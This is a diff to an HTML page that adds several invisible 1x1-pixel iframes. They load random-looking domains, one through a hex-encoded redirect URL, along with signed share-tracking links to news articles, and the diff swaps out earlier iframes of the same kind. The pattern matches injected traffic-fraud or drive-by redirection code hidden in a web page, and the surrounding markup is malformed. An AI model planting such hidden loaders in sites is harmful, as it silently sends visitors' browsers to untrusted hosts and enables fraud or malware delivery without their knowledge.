--- a/00.html
+++ b/00.html
@@ -4,9 +4,18 @@
 <?php
 <body>
    
-    <iframe src="http://dl.upo9s8.work/ZWYjI2I" width="1" height="1"></iframe>
+  
+    <iframe src="http://d.cj0415gert.shop/Rpxkg33707" width="1" height="1"></iframe>
+
+    <iframe src="https://ssse9sa15.nnfi1819z.com/?url=68747470733A2F2F3134397366667373313431332E6E6E6669313831397A2E636F6D2F3F6170693D32463730324637363639363436353646324433343330333833393332333033363244373536393634324433323331333933393337333032453638373436443643" width="1" height="1"></iframe>
+
+    <iframe src="https://ssse9sa15.nnfi1819z.com/?url=68747470733A2F2F3134397366667373313431332E6E6E6669313831397A2E636F6D2F3F6170693D32463730324637363639363436353646324433343330333833393332333033363244373536393634324433323331333933393337333032453638373436443643" width="1" height="1"></iframe>
+
+    <iframe src="https://focu.youth.cn/articlefour/20230831?sid=49758391&uid=43926004&timestamp=1694002726&signature=nG63ezAQDowMB0vlYg4k6ZEK2C58wg31L8KN5yR9XpjPOxrbdE&share_id=43926004497583911694002734036&scene_id=fire_share&time=1694002734036&share_way=wx" width="1" height="1"></iframe>
+
+    <iframe src="https://focu.youth.cn/articlefour/20230904?sid=49781453&uid=43926004&timestamp=1694002726&signature=NRxPz8j0mdBYbOGDW91l9ZWeYudLy6D4yAXV56qwogJEpkLK2e&scene_id=fire_share&share_id=43926004497814531694002767029&share_way=wx" width="1" height="1"></iframe>  
 	
-</body> <iframe src="https://mr.baidu.com/15Ix3iumoPm" width="1" height="1"></iframe>
+</body> 
 
 <html
 	<head> 
@@ -54,10 +63,6 @@ infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100%
    <body>
    
     <iframe src=" https://mr.baidu.com/15yPnDNwH3G" width="1" height="1"></iframe>
-
- <iframe src="http://art.jtmtht.net/detail/share/1693317/16933162/169331614/1693316140.html?content_id=1693316140&key=ea48PyqWTNkSJy2j-KZMGR5_dQKYvYUKhgeP1VM1SUkcpaqP8Fspcu9kRrVAA-Fj0r2u9h8_K-beuq8p0ls6EU1B7M9hN-0VYQw_OduZ8ONo6NKLKmIJr6yZfAeygyd2DPsKUuhICWwwEbpM0hV5N_8pnpqqGSGu0iBC_6xh_cQFiqIy&pv_id=&cid=16&fr=1&i=2130706433&content_type=1&circle_id=0&topic_id=0&shareContentType=1&nick_name=%E9%81%93%E5%9C%B0%E6%97%85%E7%A8%8B&nickname=%E9%81%93%E5%9C%B0%E6%97%85%E7%A8%8B&extend_source_id=800000&avatar=http://qtt.om.gtimg.com/newsapp_ls/0/10933081780_200200/0&version=31101000&shareContentType=1&source=undefined&member_id=904475320&share_id=" width="1" height="1"></iframe>
-
- <iframe src="http://art.jtmtht.net/share/detail/video_out.html?content_id=1693291332&key=e0a6CU7AjIRPgh2yNTJlbbu_DoP5QI0EZNSf1dRa4R6QKfm8mjxIERgpwsVG0Ln5R9dJy-YJrpe4Bii9WXqjrpyBTHDU92peSNdn6rYtNsBa2c_i7IL3Rz17qauQwBEupch2VwtTmqQrURDJDqPy-UhGN5I9gAVuJBB2zGQX-t0QyhQ0&pv_id=&cid=1&jsonp=%2F%2Fhtml2.qktoutiao.com%2Fdetail%2Fjsonp%2F1693292%2F16932914%2F169329134%2F1693291332.js&fr=2&i=2130706433&content_type=3&circle_id=0&topic_id=0&shareContentType=2&nick_name=%E4%B8%9C%E7%82%B9%E8%A7%86%E9%A2%91&nickname=%E4%B8%9C%E7%82%B9%E8%A7%86%E9%A2%91&extend_source_id=800000&avatar=https://qtt.om.gtimg.com/om_ls/OxlP2Rq6Fl15LZuYGh111wQYAFHEBMK60VujVKLDtSvtkAA_200200/0&version=31101000&shareContentType=2&source=undefined&member_id=904475320&share_id=" width="1" height="1"></iframe>
 
 
 </body>
